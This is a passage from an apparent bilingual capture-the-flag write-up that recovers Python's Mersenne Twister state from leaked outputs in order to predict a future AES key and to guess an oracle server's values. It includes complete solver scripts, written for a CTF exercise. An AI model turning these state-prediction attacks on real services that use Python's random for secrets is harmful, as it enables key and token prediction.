zeros = [rng.mt[0] ^ 0x80000000]
for i in range(20):
    zeros.append(outputs[i] ^ rng.getrandbits(b))
    a, b = b, a + b
for candidate in lin.solve_all(zeros):
    ...

乱数の初期化時に内部状態の0番目は0x80000000で固定されるため、rng.mt[0] ^ 0x80000000 == 0を条件として追加しています。これを実行してみると、 $2^{11} = 2048$ 通りの候補が残ります。

2. 未来の出力を高速に計算する

100 回の getrandbits で進む内部状態は $B := \sum_{i=2}^{101} \lceil \frac{F_i}{32} \rceil = 46891266756465502660 \approx 4.6 \times 10^{19}$ 個です。これを直接シミュレーションで進めるのは現実的ではありません。

そこで、MT19937 の出力列が GF(2) 上の線形帰還列であることを使います。temper は GF(2) 上の線形変換なので、temper済みの出力列も同じ線形帰還を満たします。つまり「ある係数列 $c_i \in \mathbb{Z}/2\mathbb{Z}$ が存在して、任意の $t$ に対し $y_t = \bigoplus_{i=1}^{19937} c_i y_{t-i}$ が成り立つ」という形の漸化式です。

この式を繰り返し適用すると、任意の $t$ に対して $y_t$ を最初の 19937 個 $y_0,\dots,y_{19936}$ の XOR 結合として書けます。この時の係数は、 $f(x) = \sum_{i=0}^{19937} c_i x^i$ として $x^t \bmod f(x)$ の係数として表されます。この $f(x)$ は、MT19937 を適当なシードで（シードによらず一意に決まります）動かして十分長いビット列を取り、Berlekamp-Massey で最小多項式を求めることで計算できます。 $x^t \bmod f(x)$ は繰り返し二乗法を用いて対数時間で計算できるため、任意の位置の出力を高速に計算できるようになります。

3. フラグを復号する

2048 通りの候補状態それぞれについて、最初の 19937 個の出力を取り、上の線形結合で $B,B+1,B+2,B+3$ 番目の出力を求めます。これら 4 つを連結して AES 鍵 16 bytes を作り、与えられた暗号文を復号します。復号結果が tkbctf{ で始まるものを選べばフラグが得られます。

ソルバ（クリックで展開）

from gf2bv import LinearSystem
from gf2bv.crypto.mt import MT19937
from sage.all import *
from Crypto.Cipher import AES
from tqdm import tqdm
 
def temper(x):
    x = x ^ (x >> 11)
    x = x ^ ((x << 7) & 0x9d2c5680)
    x = x ^ ((x << 15) & 0xefc60000)
    x = x ^ (x >> 18)
    return x & 0xffffffff
 
def untemper(y):
    y ^= y >> 18
    y ^= y << 15 & 0xefc60000
    y ^= (y << 7 & 0x9d2c5680) ^ (y << 14 & 0x94284000) ^ (y << 21 & 0x14200000) ^ (y << 28 & 0x10000000)
    y ^= y >> 11 ^ y >> 22
    return y
 
vals = []
with open("../distfiles/output.txt") as f:
    for _ in range(20):
        vals.append(int(f.readline()))
    f.readline()
    flag_enc = bytes.fromhex(f.readline())
 
lin = LinearSystem([32] * 624)
mt = lin.gens()
rng = MT19937(mt)
 
a = b = 1
bs = []
for _ in range(100):
    bs.append(b)
    a, b = b, a + b
 
zeros = [rng.mt[0] ^ 0x80000000]
for i in range(20):
    zeros.append(vals[i] ^ rng.getrandbits(bs[i]))
 
coeff_ones = [0, 1189, 1416, 1585, 1643, 1870, 2493, 2773, 3000, 3227, 3454, 3681, 3908, 4135, 4362, 4753, 5661, 6337, 6569, 7129, 7477, 7525, 7583, 7752, 7979, 8206, 9505, 9901, 9969, 10128, 10693, 10761, 10920, 11089, 11147, 11157, 11215, 11321, 11374, 11384, 11485, 11611, 11712, 11717, 11838, 11881, 11944, 11997, 12277, 12335, 12393, 12504, 12509, 12620, 12673, 12731, 12736, 12789, 12905, 12958, 12963, 13137, 13185, 13190, 13243, 13301, 13412, 13528, 13533, 13639, 13697, 13760, 13813, 13866, 14093, 14151, 14209, 14320, 14325, 14436, 14547, 14552, 14605, 14721, 14774, 14779, 14953, 15001, 15006, 15059, 15117, 15228, 15344, 15349, 15455, 15513, 15576, 15629, 15682, 15909, 15967, 16025, 16136, 16141, 16252, 16363, 16368, 16421, 16537, 16590, 16595, 16817, 16822, 16875, 16933, 17044, 17160, 17271, 17329, 17445, 17498, 17725, 17783, 17841, 17952, 18068, 18179, 18237, 18406, 18633, 18691, 18860, 19087, 19314, 19937]
coeffs = [0] * 19938
for i in coeff_ones:
    coeffs[i] = 1
K = GF(2**19937, "x", modulus=coeffs)
x = K.gen()
 
base = sum((b+31)//32 for b in bs)
cs = [list(x**(base+i)) for i in range(4)]
 
for k, res in tqdm(enumerate(lin.solve_all(zeros))):
    rng = MT19937(res)
    pyrand = rng.to_python_random()
 
    a = [pyrand.getrandbits(32) for _ in range(19937)]
 
    key = b""
    vs = []
    for i in range(4):
        v = 0
        for j in range(19937):
            if cs[i][j]:
                v ^= a[j]
        key += int.to_bytes(v, 4, "little")
 
    flag = AES.new(key, AES.MODE_ECB).decrypt(flag_enc)
    if flag.startswith(b"tkbctf{"):
        print(k, flag)
        break

crypto

RANDOM IN THE FUTURE. (24 solves)

Challenge

The following script and its output are given.

import random
import os
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
a = b = 1
for _ in range(100):
    print(random.getrandbits(b))
    a, b = b, a + b
print(AES.new(random.randbytes(16), AES.MODE_ECB).encrypt(pad(flag.encode(), 16)).hex())

random.getrandbits(b) is called for a Fibonacci sequence $1,2,3,5,8,\ldots$ of length 100, and finally the flag is encrypted with a key generated by random.randbytes(16). If we can recover the final internal state of random, we're done, but the last 80 outputs are hidden. The basic strategy is to recover the internal state from the first 20 outputs and then advance the state by 80 steps.

1. Enumerate state candidates from linear equations

Python's random uses the MT19937 algorithm. MT19937 is a pseudorandom number generator producing 32-bit outputs, and its internal state consists of 624 32-bit integers. Since both state updates and the output temper function are linear operations over GF(2), MT19937 has the property that any output can be expressed as a linear combination of the initial 19937-bit internal state. Therefore, each output bit yields one linear equation over the initial internal state variables, and all output bits together form a linear system. Solving this system enumerates candidates for the internal state.

Using the library gf2bv, the linear system can be solved easily as follows.

from gf2bv import LinearSystem
from gf2bv.crypto.mt import MT19937
 
lin = LinearSystem([32] * 624)
mt = lin.gens()
rng = MT19937(mt)
 
a = b = 1
zeros = [rng.mt[0] ^ 0x80000000]
for i in range(20):
    zeros.append(outputs[i] ^ rng.getrandbits(b))
    a, b = b, a + b
for candidate in lin.solve_all(zeros):
    ...

Since the 0th element of the internal state is fixed to 0x80000000 at initialization, we add the condition rng.mt[0] ^ 0x80000000 == 0. Running this leaves $2^{11} = 2048$ candidates.

2. Quickly compute future outputs

The number of internal state advances from 100 getrandbits calls is $B := \sum_{i=2}^{101} \lceil \frac{F_i}{32} \rceil = 46891266756465502660 \approx 4.6 \times 10^{19}$ . Simulating this directly is not feasible.

Instead, we use the fact that MT19937's output sequence is a linear recurrence over GF(2). Since temper is a linear transformation over GF(2), the tempered output sequence also satisfies the same linear recurrence. That is, there exist coefficients $c_i \in \mathbb{Z}/2\mathbb{Z}$ such that for any $t$ , $y_t = \bigoplus_{i=1}^{19937} c_i y_{t-i}$ holds.

By repeatedly applying this relation, $y_t$ can be expressed for any $t$ as an XOR combination of the first 19937 values $y_0, \ldots, y_{19936}$ . The coefficients at position $t$ are given by the coefficients of $x^t \bmod f(x)$ where $f(x) = \sum_{i=0}^{19937} c_i x^i$ . This $f(x)$ can be computed by running MT19937 with any seed (it is uniquely determined regardless of the seed) to get a sufficiently long bit sequence, then finding the minimal polynomial using the Berlekamp-Massey algorithm. Since $x^t \bmod f(x)$ can be computed in logarithmic time using repeated squaring, we can efficiently compute outputs at any position.

3. Decrypt the flag

For each of the 2048 candidate states, take the first 19937 outputs and compute the outputs at positions $B, B+1, B+2, B+3$ using the linear combination above. Concatenate these 4 values to form the 16-byte AES key, then decrypt the given ciphertext. Choose the result that starts with tkbctf{ to get the flag.

Solver (click to expand)

from gf2bv import LinearSystem
from gf2bv.crypto.mt import MT19937
from sage.all import *
from Crypto.Cipher import AES
from tqdm import tqdm
 
def temper(x):
    x = x ^ (x >> 11)
    x = x ^ ((x << 7) & 0x9d2c5680)
    x = x ^ ((x << 15) & 0xefc60000)
    x = x ^ (x >> 18)
    return x & 0xffffffff
 
def untemper(y):
    y ^= y >> 18
    y ^= y << 15 & 0xefc60000
    y ^= (y << 7 & 0x9d2c5680) ^ (y << 14 & 0x94284000) ^ (y << 21 & 0x14200000) ^ (y << 28 & 0x10000000)
    y ^= y >> 11 ^ y >> 22
    return y
 
vals = []
with open("../distfiles/output.txt") as f:
    for _ in range(20):
        vals.append(int(f.readline()))
    f.readline()
    flag_enc = bytes.fromhex(f.readline())
 
lin = LinearSystem([32] * 624)
mt = lin.gens()
rng = MT19937(mt)
 
a = b = 1
bs = []
for _ in range(100):
    bs.append(b)
    a, b = b, a + b
 
zeros = [rng.mt[0] ^ 0x80000000]
for i in range(20):
    zeros.append(vals[i] ^ rng.getrandbits(bs[i]))
 
coeff_ones = [0, 1189, 1416, 1585, 1643, 1870, 2493, 2773, 3000, 3227, 3454, 3681, 3908, 4135, 4362, 4753, 5661, 6337, 6569, 7129, 7477, 7525, 7583, 7752, 7979, 8206, 9505, 9901, 9969, 10128, 10693, 10761, 10920, 11089, 11147, 11157, 11215, 11321, 11374, 11384, 11485, 11611, 11712, 11717, 11838, 11881, 11944, 11997, 12277, 12335, 12393, 12504, 12509, 12620, 12673, 12731, 12736, 12789, 12905, 12958, 12963, 13137, 13185, 13190, 13243, 13301, 13412, 13528, 13533, 13639, 13697, 13760, 13813, 13866, 14093, 14151, 14209, 14320, 14325, 14436, 14547, 14552, 14605, 14721, 14774, 14779, 14953, 15001, 15006, 15059, 15117, 15228, 15344, 15349, 15455, 15513, 15576, 15629, 15682, 15909, 15967, 16025, 16136, 16141, 16252, 16363, 16368, 16421, 16537, 16590, 16595, 16817, 16822, 16875, 16933, 17044, 17160, 17271, 17329, 17445, 17498, 17725, 17783, 17841, 17952, 18068, 18179, 18237, 18406, 18633, 18691, 18860, 19087, 19314, 19937]
coeffs = [0] * 19938
for i in coeff_ones:
    coeffs[i] = 1
K = GF(2**19937, "x", modulus=coeffs)
x = K.gen()
 
base = sum((b+31)//32 for b in bs)
cs = [list(x**(base+i)) for i in range(4)]
 
for k, res in tqdm(enumerate(lin.solve_all(zeros))):
    rng = MT19937(res)
    pyrand = rng.to_python_random()
 
    a = [pyrand.getrandbits(32) for _ in range(19937)]
 
    key = b""
    vs = []
    for i in range(4):
        v = 0
        for j in range(19937):
            if cs[i][j]:
                v ^= a[j]
        key += int.to_bytes(v, 4, "little")
 
    flag = AES.new(key, AES.MODE_ECB).decrypt(flag_enc)
    if flag.startswith(b"tkbctf{"):
        print(k, flag)
        break

crypto

El Dorado (1 solve)

問題

次のようなサーバが与えられます。

import os
import random
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
random.seed(os.urandom(64))
print([random.random() for _ in range(131)])
 
happiness = 0
next_val = random.random()
while abs(happiness) < 10**6:
    if float(input()) == next_val:
        print("correct :)")
        happiness += 1
        next_val = random.random()
    else:
        print("incorrect :(")
        happiness -= 1
if happiness < 0:
    print("Too unhappy...")
else:
    print("I'm very happy now! Here is the flag:", flag)

接続すると random.random() の値を131個受け取ります。その後、次の random.random() の値を当て続けるオラクルが始まり、正解数の累計が不正解数の累計を $10^6$ 上回ればフラグが得られます。

解法

以降、以下のように定義した値を用います。

init_key：init_by_array に渡される長さ32の配列
seed：長さ624の配列、init_by_arrayの2番目のループで使われるinit_key[j] + jの値の列
state：init_by_array が完了した直後の MT19937 内部状態（長さ624の32bit整数配列）
output：state に対してtwist操作を行った後の配列
tempered：output[i] にtemper変換を施した32bit値

1. `random.seed` の内部動作

random.seed(os.urandom(64)) の内部では、渡された64バイトの値 a は、 a = int.from_bytes(a + sha512(a).digest()) としてSHA-512ハッシュを末尾に付加し、エンディアンの変換と32bitワードの配列への変換の後、init_by_array に init_key として渡されます。このため、init_key[0:16] が sha512(a) の逆順、init_key[16:32] が元の64バイトのシードaの逆順に対応します。

init_by_arrayは以下のようになっています。

def init_by_array(init_key):
    mt = [0] * 624
    mt[0] = 19650218
    for i in range(1, 624):
        mt[i] = (0x6c078965 * (mt[i-1] ^ (mt[i-1] >> 30)) + i) & 0xffffffff
    i = 1
    j = 0
    for _ in range(max(624, len(init_key))):  # len(init_key)=32 なので624回
        mt[i] = ((mt[i] ^ (mt[i-1] ^ (mt[i-1] >> 30)) * 1664525) + init_key[j] + j) & 0xffffffff
        i += 1
        j += 1
        if i >= 624:
            mt[0] = mt[623]
            i = 1
        if j >= len(init_key):
            j = 0
    for _ in range(623):
        mt[i] = (mt[i] ^ ((mt[i-1] ^ (mt[i-1] >> 30)) * 1566083941)) - i & 0xffffffff
        i += 1
        if i >= 624:
            mt[0] = mt[623]
            i = 1
    mt[0] = 0x80000000
    return mt

第2ループでは j が len(init_key) = 32 の周期で循環しながら624回処理されます。したがって、ループの $k$ 番目の処理で使われる値seed[k]と $k+32$ 番目の処理で使われる値seed[k+32]は常に同じ値になります。

2. `random.random()` の出力形式

CPythonの random.random() の実装は以下の通りです。

static PyObject *
_random_Random_random_impl(RandomObject *self)
{
    uint32_t a=genrand_uint32(self)>>5, b=genrand_uint32(self)>>6;
    return PyFloat_FromDouble((a*67108864.0+b)*(1.0/9007199254740992.0));
}

連続する2つの32bit出力から、前者の上位27bitと後者の上位26bitを組み合わせて53bit精度の浮動小数点数を計算しています。これを逆に計算することで、プログラムの最初に[random.random() for _ in range(131)]として与えられる131個の値からtempered[0:262] の各上位ビットが以下のようにして誤差なく復元できます。一方、偶数番目の下位5bit・奇数番目の下位6bitはここで失われており、入力から直接は復元できません。

leak = []
for i in range(131):
    v = int(raw_leak[i] * 0x20000000000000)
    v1, v2 = v >> 26, v & 0x3ffffff
    leak += [v1 << 5, v2 << 6] # 下位bitは不明

3. twist逆変換と `untwist` 関数

CPythonのtwist操作はMT配列をin-placeで更新します。インデックス0から順に処理するため、 $i \geq N - M = 624 - 397 = 227$ の位置では参照先 $i - 227$ の値がすでに更新済みの output[i-227] になっています。したがって、twist式は次のように書けます（ $f(x) = (x \gg 1) \oplus (x \mathbin{\&} 1) \times \texttt{0x9908b0df}$ ）。

$\text{output}[i] = \text{output}[i-227] \oplus f\bigl((\text{state}[i] \mathbin{\&} \texttt{0x80000000}) \mid (\text{state}[i+1] \mathbin{\&} \texttt{0x7fffffff})\bigr) \quad (i \geq 227)$

整理すると、

$f^{-1}(\text{output}[i] \oplus \text{output}[i-227]) = (\text{state}[i] \mathbin{\&} \texttt{0x80000000}) \mid (\text{state}[i+1] \mathbin{\&} \texttt{0x7fffffff})$

untemperはGF(2)上の線形変換なので、

$\text{untemper}(\text{tempered}[i] \oplus \text{tempered}[i-227]) = \text{output}[i] \oplus \text{output}[i-227]$

が成り立ちます。よって、

tempered[i] と tempered[i-227]が分かれば、

$f^{-1}(\text{untemper}(\text{tempered}[i] \oplus \text{tempered}[i-227]))$

を計算することで state[i]の最上位bitとstate[i+1]の下位31bitが求まります。

しかし、tempered[227+i] ^ tempered[i]は下位6bitが失われています。この未知の下位6bitをlow[i]と置きます。

state[i]の最上位bitはlow[i]の値に関わらずtempered[227+i] ^ tempered[i]の上位26bitによって一意に決まりますが、state[i+1]の下位31bitを求めるには、low[i] を求める必要があります。

4. `ith_seed`：内部状態から `seed` を計算する

init_by_arrayを逆算すると、stateから以下のようにしてseedを求めることができます（ただし、seed[0]などは一意には求まりません）。

def state2seed(state):
    assert state[0] == 0x80000000
    state_ = [0] * 624
    state_[1] = ((state[1] + 1) ^ ((state[623] ^ (state[623] >> 30)) * 1566083941)) & 0xffffffff
    for i in reversed(range(3, 624)):
        state_[i] = ((state[i] + i) ^ (state[i-1] ^ (state[i-1] >> 30)) * 1566083941) & 0xffffffff
    state_[2] = ((state[2] + 2) ^ (state_[1] ^ (state_[1] >> 30)) * 1566083941) & 0xffffffff
    mt = [0] * 624
    mt[0] = 19650218
    for i in range(1, 624):
        mt[i] = (0x6c078965 * (mt[i - 1] ^ (mt[i - 1] >> 30)) + i) & 0xffffffff
    seed = [-(mt[1] ^ (mt[0] ^ (mt[0] >> 30)) * 1664525) & 0xffffffff]
    seed.append((state_[2] - mt[2]) & 0xffffffff)
    for i in range(2, 623):
        seed.append((state_[i+1] - (mt[i+1] ^ (state_[i] ^ (state_[i] >> 30)) * 1664525)) & 0xffffffff)
    seed.append((state_[1] - (state_[623] ^ (state_[623] >> 30)) * 1664525) & 0xffffffff)
    return seed

更にここから、state[i-1],state[i],state[i+1]を使って以下のようにしてseed[i]( $3 \leq i \leq 622$ )を求められることがわかります。

mt = [0] * 624
mt[0] = 19650218
for i in range(1, 624):
    mt[i] = (0x6c078965 * (mt[i - 1] ^ (mt[i - 1] >> 30)) + i) & 0xffffffff
 
f = lambda x: (x ^ (x >> 30)) * 1664525
g = lambda x: (x ^ (x >> 30)) * 1566083941
def _ith_seed(x, y, z, i):
    a = ((y + i) ^ g(x)) & 0xffffffff
    b = ((z + i+1) ^ g(y)) & 0xffffffff
    return (b - (mt[i+1] ^ f(a))) & 0xffffffff
 
def ith_seed(i):
    return _ith_seed(state[i-1], state[i], state[i+1], i)

5. 初期候補の列挙

以下のようにしてseed[229]とseed[261]をそれぞれ求めます。

low[0],low[1],low[2]を全探索（ $2^{18}$ 通り）します。ここからstate[228], state[229], state[230]が求まり、_ith_seed(state[228], state[229], state[230], 229)としてseed[229]を求めることができます。

low[32],low[33],low[34]とstate[262]の最上位bitを全探索（ $2^{19}$ 通り）します。ここからstate[260], state[261], state[262]が求まり、_ith_seed(state[260], state[261], state[262], 261)としてseed[261]を求めることができます。

seed[229] = seed[261]なので、これらを突き合わせることで正しいlowの組み合わせを絞ることができます。両グループを合わせて $2^{18} \times 2^{19} = 2^{37}$ 通りの組み合わせを全探索し、この条件を満たすものだけを残すと、期待 $2^{37} / 2^{32} = 2^5$ 通りまで候補を絞ることができます。

6. オラクルを使った拡張と seed の復元

前述の方法で絞ったlow[1], low[2], low[33], low[34]の組それぞれについて、追加でlow[3]を全探索します。すると、

_ith_seed(state[229], state[230], state[231], 230)としてseed[230]が計算できます。

_ith_seed(state[261]とstate[262], z, 262) == seed[230]という式からzについて解くと、z、つまりstate[263]の値の候補が $2^6$ 通り得られます。

def solve_z(s, x, y, i):
    a = ((y + i) ^ g(x)) & 0xffffffff
    # s == (b - (mt[i+1] ^ f(a))) & 0xffffffff
    b = s + (mt[i+1] ^ f(a)) & 0xffffffff
    # b = ((z + i+1) ^ g(y)) & 0xffffffff
    z = (b ^ g(y)) - (i+1) & 0xffffffff
    return z

これを2回繰り返すとstate[263],state[264]がわかり、そこからoutput[262],output[263]、更にrandom.random()の次の値を計算できます。この値をサーバーに渡すことで、オラクルによって正否を確認できます。 happyが帰ってくれば、そこまでのlowの組み合わせが正しいことがわかります（正確にはすべてのlowの値が正しくなくても正しい場合と同じ出力になる場合があるので、更に続けることによって絞ります）。

一回のオラクル呼び出しにつき2つのseedの値が新しく求まるため、これを13回繰り返すと seed[229:256]が復元できます。 seed[240:256]はinit_key[16:32]、つまりrandom.seedに与えられた値に対応するので、この値を手元のrandomに与えると、サーバーと同じ状態を再現でき、後の出力を完全に予測できます。

あとは予測した random.random() 値をオラクルに答え続けることでフラグが得られます。

注意点として、 $10^6$ 回のやり取りが必要なため、1回ずつ送受信すると往復遅延が積み重なり現実的な時間では終わりません。複数の予測値を1度にまとめて送るbatch sendを行うことでこれを解決できます。

ソルバの全体は以下のようになります。

ソルバ（クリックで展開）

import ast
from pwn import *
import itertools
from tqdm import tqdm, trange
 
BATCH_SIZE = 1024
 
def temper(x):
    x = x ^ (x >> 11)
    x = x ^ ((x << 7) & 0x9d2c5680)
    x = x ^ ((x << 15) & 0xefc60000)
    x = x ^ (x >> 18)
    return x & 0xffffffff
def untemper(y):
    y ^= y >> 18
    y ^= y << 15 & 0xefc60000
    y ^= (y << 7 & 0x9d2c5680) ^ (y << 14 & 0x94284000) ^ (y << 21 & 0x14200000) ^ (y << 28 & 0x10000000)
    y ^= y >> 11 ^ y >> 22
    return y
f = lambda x: (x ^ (x >> 30)) * 1664525
g = lambda x: (x ^ (x >> 30)) * 1566083941
def ith_seed(x, y, z, i):
    a = ((y + i) ^ g(x)) & 0xffffffff
    b = ((z + i+1) ^ g(y)) & 0xffffffff
    return (b - (mt[i+1] ^ f(a))) & 0xffffffff
def untwist(i, d, k):
    y = untemper(leak[i-227] ^ leak[i] ^ d)
    s = y << 1 ^ (y >> 31) * 0x1321161bf
    return s & 0x7fffffff | k * 0x80000000, s >> 31
 
sc = remote("localhost", 1337)
 
raw_leak = ast.literal_eval(sc.recvline().decode())
 
leak = []
for i in range(131):
    v = int(raw_leak[i]*0x20000000000000)
    v1, v2 = v>>26, v&0x3ffffff
    leak += [v1<<5, v2<<6]
 
mt = [0] * 624
mt[0] = 19650218
for i in range(1, 624):
    mt[i] = (0x6c078965 * (mt[i - 1] ^ (mt[i - 1] >> 30)) + i) & 0xffffffff
 
happiness = 0
correct = {}
def oracle(val):
    global happiness
    sc.sendline(str(val).encode())
    res = sc.recvline(timeout=1).rstrip() == b"correct :)"
    happiness += 1 if res else -1
    return res
 
def check_all(i, lst):
    global happiness
    ret = []
    pbar = trange(0, len(lst), BATCH_SIZE)
    pbar.set_description(f"{i=}")
    for j in pbar:
        batch = []
        for a, b in lst[j:min(j+BATCH_SIZE, len(lst))]:
            val = (a * 0x4000000 + b) / 0x20000000000000
            batch.append(val)
        sent = False
        if i not in correct:
            sent = True
            sc.sendline("\n".join(map(str, batch)).encode())
        for a, b in lst[j:min(j+BATCH_SIZE, len(lst))]:
            if sent:
                res = sc.recvline().rstrip()
                assert res in (b"incorrect :(", b"correct :)"), res
                res = res == b"correct :)"
                happiness += 1 if res else -1
            if i in correct:
                ret.append(correct[i] == (a, b))
            else:
                ret.append(res)
                if res:
                    correct[i] = (a, b)
    return ret
 
 
def next_cands(i, dis, djs, seed_arr, K):
    *_, d0i, d1i = dis
    *_, d0j, d1j = djs
    for d2i, t in itertools.product(range(64), range([2, 1][i % 2])):
        _, k = untwist(i-31, 0, 0)
        st231, k = untwist(i-32, d2i, k)
        st230, k = untwist(i-33, d1i, k)
        st229, k = untwist(i-34, d0i, k)
        se = ith_seed(st229, st230, st231, i-32)
 
        st262, k = untwist(i-1, d1j, K)
        st261, k = untwist(i-2, d0j, k)
 
        v = ((st262 + i) ^ g(st261)) & 0xffffffff
        st263 = (((se + (mt[i+1] ^ f(v))) ^ g(st262)) - (i+1)) & 0xffffffff
 
        x = st263 & 0x7fffffff | K * 0x80000000
        a262 = leak[i-227] ^ temper((x >> 1) ^ (x & 1) * 0x9908b0df)
        d2j = (a262&0x3f) ^ (t<<5)
 
        if i % 2 == 0:
            leak.append(a262 ^ d2j)
            yield from next_cands(i+1, dis + [d2i], djs + [d2j], seed_arr + [se - i % 32], st263>>31)
            leak.pop()
        else:
            yield (leak[-1], a262 ^ d2j, dis + [d2i], djs + [d2j], seed_arr + [se - i % 32], st263>>31)
 
def search_last(i, seed_arr):
    seed = b"".join([v.to_bytes(4, "big") for v in seed_arr[:-17:-1]])
    random.seed(seed)
    if raw_leak == [random.random() for _ in range(len(raw_leak))]:
        print(seed)
        print(happiness)
        while not oracle(random.random()):
            pass
        cnt = -happiness + 10**6
        for j in trange(0, cnt, BATCH_SIZE):
            sc.sendline("\n".join(str(random.random()) for _ in range(j, min(j+BATCH_SIZE, cnt))).encode())
            for _ in range(j, min(j+BATCH_SIZE, cnt)):
                assert sc.recvline() == b"correct :)\n"
        print(sc.recvline())
        exit(0)
 
def search(i, dis, djs, seed_arr, K):
    if len(seed_arr) == 27:
        search_last(i, seed_arr)
        return
 
    cands = list(next_cands(i, dis, djs, seed_arr, K))
    ret = check_all(i, [(x>>5, y>>6) for x, y, _, _, _, _ in cands])
    for res, (x, y, _dis, _djs, _seed_arr, _K) in zip(ret, cands):
        if res:
            print(i, x, y, len(leak))
            leak.append(x)
            leak.append(y)
            search(i+2, _dis, _djs, _seed_arr, _K)
            leak.pop()
            leak.pop()
 
seeds = {}
for d0i, d1i, d2i in tqdm(itertools.product(range(64), range(64), range(64))):
    _, k = untwist(230, 0, 0)
    st230, k = untwist(229, d2i, k)
    st229, k = untwist(228, d1i, k)
    st228, k = untwist(227, d0i, k)
    se229 = ith_seed(st228, st229, st230, 229)
    seeds[se229] = (d0i, d1i, d2i)
for d0j, d1j, d2j, K in itertools.product(range(64), range(64), range(64), range(2)):
    st262, k = untwist(261, d2j, K)
    st261, k = untwist(260, d1j, k)
    st260, k = untwist(259, d0j, k)
    se261 = ith_seed(st260, st261, st262, 261)
    if se261 in seeds:
        d0i, d1i, d2i = seeds[se261]
        search(262, [d1i, d2i], [d1j, d2j], [se261+256], K)

この問題の作問などでmt19937について（この記事に書いていないことを含めて）かなり知見が得られたので、更に詳しくmt19937に関するテクニックをまとめた記事を執筆予定です。お楽しみに。

crypto

El Dorado (1 solve)

Challenge

The following server is given.

import os
import random
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
random.seed(os.urandom(64))
print([random.random() for _ in range(131)])
 
happiness = 0
next_val = random.random()
while abs(happiness) < 10**6:
    if float(input()) == next_val:
        print("correct :)")
        happiness += 1
        next_val = random.random()
    else:
        print("incorrect :(")
        happiness -= 1
if happiness < 0:
    print("Too unhappy...")
else:
    print("I'm very happy now! Here is the flag:", flag)

Upon connecting, you receive 131 values from random.random(). Then an oracle begins where you must keep guessing the next random.random() value. If the cumulative correct count exceeds the cumulative incorrect count by $10^6$ , you get the flag.

Solution

We use the following definitions throughout.

init_key: the length-32 array passed to init_by_array
seed: the length-624 array, the sequence of values init_key[j] + j used in the second loop of init_by_array
state: the MT19937 internal state immediately after init_by_array completes (a length-624 array of 32-bit integers)
output: the array after applying the twist operation to state
tempered: the 32-bit value obtained by applying the temper transform to output[i]

1. Internal behavior of `random.seed`

Inside random.seed(os.urandom(64)), the given 64-byte value a is extended as a = int.from_bytes(a + sha512(a).digest()) by appending a SHA-512 hash, then after endianness conversion and conversion to an array of 32-bit words, it is passed to init_by_array as init_key. Therefore, init_key[0:16] corresponds to the reverse of sha512(a), and init_key[16:32] corresponds to the reverse of the original 64-byte seed a.

init_by_array is as follows:

def init_by_array(init_key):
    mt = [0] * 624
    mt[0] = 19650218
    for i in range(1, 624):
        mt[i] = (0x6c078965 * (mt[i-1] ^ (mt[i-1] >> 30)) + i) & 0xffffffff
    i = 1
    j = 0
    for _ in range(max(624, len(init_key))):  # len(init_key)=32, so 624 iterations
        mt[i] = ((mt[i] ^ (mt[i-1] ^ (mt[i-1] >> 30)) * 1664525) + init_key[j] + j) & 0xffffffff
        i += 1
        j += 1
        if i >= 624:
            mt[0] = mt[623]
            i = 1
        if j >= len(init_key):
            j = 0
    for _ in range(623):
        mt[i] = (mt[i] ^ ((mt[i-1] ^ (mt[i-1] >> 30)) * 1566083941)) - i & 0xffffffff
        i += 1
        if i >= 624:
            mt[0] = mt[623]
            i = 1
    mt[0] = 0x80000000
    return mt

In the second loop, j cycles with period len(init_key) = 32 over 624 iterations. Therefore, the value seed[k] used in the $k$ -th iteration and seed[k+32] used in the $(k+32)$ -th iteration are always the same.

2. Output format of `random.random()`

The CPython implementation of random.random() is as follows:

static PyObject *
_random_Random_random_impl(RandomObject *self)
{
    uint32_t a=genrand_uint32(self)>>5, b=genrand_uint32(self)>>6;
    return PyFloat_FromDouble((a*67108864.0+b)*(1.0/9007199254740992.0));
}

It combines the upper 27 bits of the first 32-bit output and the upper 26 bits of the second to compute a 53-bit precision floating-point number. Working backwards, the 131 values given as [random.random() for _ in range(131)] at the start allow us to recover the upper bits of each tempered[0:262] without error as follows. On the other hand, the lower 5 bits of even-indexed and lower 6 bits of odd-indexed entries are lost here and cannot be recovered directly from the input.

leak = []
for i in range(131):
    v = int(raw_leak[i] * 0x20000000000000)
    v1, v2 = v >> 26, v & 0x3ffffff
    leak += [v1 << 5, v2 << 6] # lower bits unknown

3. Inverse twist and the `untwist` function

CPython's twist operation updates the MT array in-place. Processing from index 0 in order means that for positions $i \geq N - M = 624 - 397 = 227$ , the reference at $i - 227$ is the already-updated output[i-227]. Therefore the twist formula can be written as follows (where $f(x) = (x \gg 1) \oplus (x \mathbin{\&} 1) \times \texttt{0x9908b0df}$ ):

$\text{output}[i] = \text{output}[i-227] \oplus f\bigl((\text{state}[i] \mathbin{\&} \texttt{0x80000000}) \mid (\text{state}[i+1] \mathbin{\&} \texttt{0x7fffffff})\bigr) \quad (i \geq 227)$

Rearranging:

$f^{-1}(\text{output}[i] \oplus \text{output}[i-227]) = (\text{state}[i] \mathbin{\&} \texttt{0x80000000}) \mid (\text{state}[i+1] \mathbin{\&} \texttt{0x7fffffff})$

Since untemper is a linear transformation over GF(2):

$\text{untemper}(\text{tempered}[i] \oplus \text{tempered}[i-227]) = \text{output}[i] \oplus \text{output}[i-227]$

holds. Therefore, knowing tempered[i] and tempered[i-227], we can compute

$f^{-1}(\text{untemper}(\text{tempered}[i] \oplus \text{tempered}[i-227]))$

to obtain the most significant bit of state[i] and the lower 31 bits of state[i+1].

However, tempered[227+i] ^ tempered[i] has its lower 6 bits missing. We denote this unknown lower 6 bits as low[i].

The most significant bit of state[i] is uniquely determined by the upper 26 bits of tempered[227+i] ^ tempered[i] regardless of low[i], but to recover the lower 31 bits of state[i+1], we need to find low[i].

4. `ith_seed`: computing `seed` from the internal state

By inverting init_by_array, we can compute seed from state as follows (though seed[0] etc. cannot be uniquely determined):

def state2seed(state):
    assert state[0] == 0x80000000
    state_ = [0] * 624
    state_[1] = ((state[1] + 1) ^ ((state[623] ^ (state[623] >> 30)) * 1566083941)) & 0xffffffff
    for i in reversed(range(3, 624)):
        state_[i] = ((state[i] + i) ^ (state[i-1] ^ (state[i-1] >> 30)) * 1566083941) & 0xffffffff
    state_[2] = ((state[2] + 2) ^ (state_[1] ^ (state_[1] >> 30)) * 1566083941) & 0xffffffff
    mt = [0] * 624
    mt[0] = 19650218
    for i in range(1, 624):
